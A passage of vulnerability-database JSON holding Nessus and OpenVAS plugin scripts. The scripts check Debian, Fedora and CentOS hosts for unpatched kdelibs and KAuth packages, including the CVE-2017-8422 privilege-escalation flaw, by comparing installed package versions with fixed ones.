(deb_check(release:\"8.0\", prefix:\"libkrosscore4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkrossui4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libktexteditor4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkunitconversion4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libkutils4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libnepomuk4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libnepomukquery4a\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libnepomukutils4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libplasma3\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libsolid4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libthreadweaver4\", reference:\"4:4.14.2-5+deb8u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:36:30", "description": "Several vulnerabilities were discovered in kde4libs, the core libraries for all KDE 4 applications. The Common Vulnerabilities and Exposures project identifies the following problems :\n\nCVE-2017-6410\n\nItzik Kotler, Yonatan Fridburg and Amit Klein of Safebreach Labs reported that URLs are not sanitized before passing them to FindProxyForURL, potentially allowing a remote attacker to obtain sensitive information via a crafted PAC file.\n\nCVE-2017-8422\n\nSebastian Krahmer from SUSE discovered that the KAuth framework contains a logic flaw in which the service invoking dbus is not properly checked. This flaw allows spoofing the identity of the caller and gaining root privileges from an unprivileged account.\n\nCVE-2013-2074\n\nIt was discovered that KIO would show web authentication credentials in some error cases.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 4:4.8.4-4+deb7u3.\n\nWe recommend that you upgrade your kde4libs packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-26T00:00:00", "type": "nessus", "title": "Debian DLA-952-1 : kde4libs security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2074", "CVE-2017-6410", "CVE-2017-8422"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:kdelibs-bin", "p-cpe:/a:debian:debian_linux:kdelibs5-data", "p-cpe:/a:debian:debian_linux:kdelibs5-dbg", "p-cpe:/a:debian:debian_linux:kdelibs5-dev", "p-cpe:/a:debian:debian_linux:kdelibs5-plugins", "p-cpe:/a:debian:debian_linux:kdoctools", "p-cpe:/a:debian:debian_linux:libkcmutils4", "p-cpe:/a:debian:debian_linux:libkde3support4", "p-cpe:/a:debian:debian_linux:libkdeclarative5", "p-cpe:/a:debian:debian_linux:libkdecore5", "p-cpe:/a:debian:debian_linux:libkdesu5", "p-cpe:/a:debian:debian_linux:libkdeui5", "p-cpe:/a:debian:debian_linux:libkdewebkit5", "p-cpe:/a:debian:debian_linux:libkdnssd4", "p-cpe:/a:debian:debian_linux:libkemoticons4", "p-cpe:/a:debian:debian_linux:libkfile4", "p-cpe:/a:debian:debian_linux:libkhtml5", "p-cpe:/a:debian:debian_linux:libkidletime4", "p-cpe:/a:debian:debian_linux:libkimproxy4", "p-cpe:/a:debian:debian_linux:libkio5", "p-cpe:/a:debian:debian_linux:libkjsapi4", "p-cpe:/a:debian:debian_linux:libkjsembed4", "p-cpe:/a:debian:debian_linux:libkmediaplayer4", "p-cpe:/a:debian:debian_linux:libknewstuff2-4", "p-cpe:/a:debian:debian_linux:libknewstuff3-4", "p-cpe:/a:debian:debian_linux:libknotifyconfig4", "p-cpe:/a:debian:debian_linux:libkntlm4", "p-cpe:/a:debian:debian_linux:libkparts4", "p-cpe:/a:debian:debian_linux:libkprintutils4", "p-cpe:/a:debian:debian_linux:libkpty4", "p-cpe:/a:debian:debian_linux:libkrosscore4", "p-cpe:/a:debian:debian_linux:libkrossui4", "p-cpe:/a:debian:debian_linux:libktexteditor4", "p-cpe:/a:debian:debian_linux:libkunitconversion4", "p-cpe:/a:debian:debian_linux:libkutils4", "p-cpe:/a:debian:debian_linux:libnepomuk4", "p-cpe:/a:debian:debian_linux:libnepomukquery4a", "p-cpe:/a:debian:debian_linux:libnepomukutils4", "p-cpe:/a:debian:debian_linux:libplasma3", "p-cpe:/a:debian:debian_linux:libsolid4", "p-cpe:/a:debian:debian_linux:libthreadweaver4", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-952.NASL", "href": "https://www.tenable.com/plugins/nessus/100431", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-952-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100431);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-2074\", \"CVE-2017-6410\", \"CVE-2017-8422\");\n script_bugtraq_id(59808);\n\n script_name(english:\"Debian DLA-952-1 : kde4libs security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in kde4libs, the core\nlibraries for all KDE 4 applications. The Common Vulnerabilities and\nExposures project identifies the following problems :\n\nCVE-2017-6410\n\nItzik Kotler, Yonatan Fridburg and Amit Klein of Safebreach Labs\nreported that URLs are not sanitized before passing them to\nFindProxyForURL, potentially allowing a remote attacker to obtain\nsensitive information via a crafted PAC file.\n\nCVE-2017-8422\n\nSebastian Krahmer from SUSE discovered that the KAuth framework\ncontains a logic flaw in which the service invoking dbus is not\nproperly checked. This flaw allows spoofing the identity of the caller\nand gaining root privileges from an unprivileged account.\n\nCVE-2013-2074\n\nIt was discovered that KIO would show web authentication credentials\nin some error cases.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n4:4.8.4-4+deb7u3.\n\nWe recommend that you upgrade your kde4libs packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/05/msg00023.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/kde4libs\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kdelibs-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kdelibs5-data\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kdelibs5-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kdelibs5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kdelibs5-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kdoctools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkcmutils4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkde3support4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkdeclarative5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkdecore5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkdesu5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkdeui5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkdewebkit5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkdnssd4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkemoticons4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkfile4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkhtml5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkidletime4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkimproxy4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkio5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkjsapi4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkjsembed4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkmediaplayer4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libknewstuff2-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libknewstuff3-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libknotifyconfig4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkntlm4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkparts4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkprintutils4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkpty4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkrosscore4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkrossui4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libktexteditor4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkunitconversion4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libkutils4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libnepomuk4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libnepomukquery4a\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libnepomukutils4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libplasma3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libsolid4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libthreadweaver4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"kdelibs-bin\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"kdelibs5-data\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"kdelibs5-dbg\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"kdelibs5-dev\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"kdelibs5-plugins\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"kdoctools\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkcmutils4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkde3support4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkdeclarative5\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkdecore5\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkdesu5\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkdeui5\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkdewebkit5\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkdnssd4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkemoticons4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkfile4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkhtml5\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkidletime4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkimproxy4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkio5\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkjsapi4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkjsembed4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkmediaplayer4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libknewstuff2-4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libknewstuff3-4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libknotifyconfig4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkntlm4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkparts4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkprintutils4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkpty4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkrosscore4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkrossui4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libktexteditor4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkunitconversion4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libkutils4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libnepomuk4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libnepomukquery4a\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libnepomukutils4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libplasma3\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libsolid4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libthreadweaver4\", reference:\"4:4.8.4-4+deb7u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:34:04", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-05-15T00:00:00", "type": "openvas", "title": "Fedora Update for kf5-kauth FEDORA-2017-7e3437b905", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872676", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872676", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kf5-kauth FEDORA-2017-7e3437b905\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872676\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-15 15:18:28 +0200 (Mon, 15 May 2017)\");\n script_cve_id(\"CVE-2017-8422\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kf5-kauth FEDORA-2017-7e3437b905\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kf5-kauth'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kf5-kauth on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-7e3437b905\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DOVPKBULHFCINVL33RCP4RKRN6XK757W\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"kf5-kauth\", rpm:\"kf5-kauth~5.33.0~2.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:36", "description": "Check the version of kdelibs", "cvss3": {}, "published": "2017-05-23T00:00:00", "type": "openvas", "title": "CentOS Update for kdelibs CESA-2017:1264 centos7", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2019-03-08T00:00:00", "id": "OPENVAS:1361412562310882719", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882719", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kdelibs CESA-2017:1264 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882719\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-23 07:03:15 +0200 (Tue, 23 May 2017)\");\n script_cve_id(\"CVE-2017-8422\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for kdelibs CESA-2017:1264 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of kdelibs\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The K Desktop Environment (KDE) is a\ngraphical desktop environment for the X Window System. The kdelibs packages\ninclude core libraries for the K Desktop Environment.\n\nSecurity Fix(es):\n\n * A privilege escalation flaw was found in the way kdelibs handled D-Bus\nmessages. A local user could potentially use this flaw to gain root\nprivileges by spoofing a callerID and leveraging a privileged helper\napplication. (CVE-2017-8422)\n\nRed Hat would like to thank Sebastian Krahmer (SUSE) for reporting this\nissue.\");\n script_tag(name:\"affected\", value:\"kdelibs on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:1264\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-May/022413.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"kdelibs\", rpm:\"kdelibs~4.14.8~6.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdelibs-apidocs\", rpm:\"kdelibs-apidocs~4.14.8~6.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdelibs-common\", rpm:\"kdelibs-common~4.14.8~6.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdelibs-devel\", rpm:\"kdelibs-devel~4.14.8~6.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kdelibs-ktexteditor\", rpm:\"kdelibs-ktexteditor~4.14.8~6.el7_3\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:22", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-05-15T00:00:00", "type": "openvas", "title": "Fedora Update for kdelibs FEDORA-2017-aff6f6bd9d", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8422"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872673", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872673", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kdelibs FEDORA-2017-aff6f6bd9d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872673\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-15 15:18:20 +0200 (Mon, 15 May 2017)\");\n script_cve_id(\"CVE-2017-8422\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kdelibs FEDORA-2017-aff6f6bd9d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kdelibs'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kdelibs on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-aff6f6bd9d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZP5YSPV5F5SQGBI2YKAPXV77FIFH244Y\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"kdelibs\", rpm:\"kdelibs~4.14.30~2.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 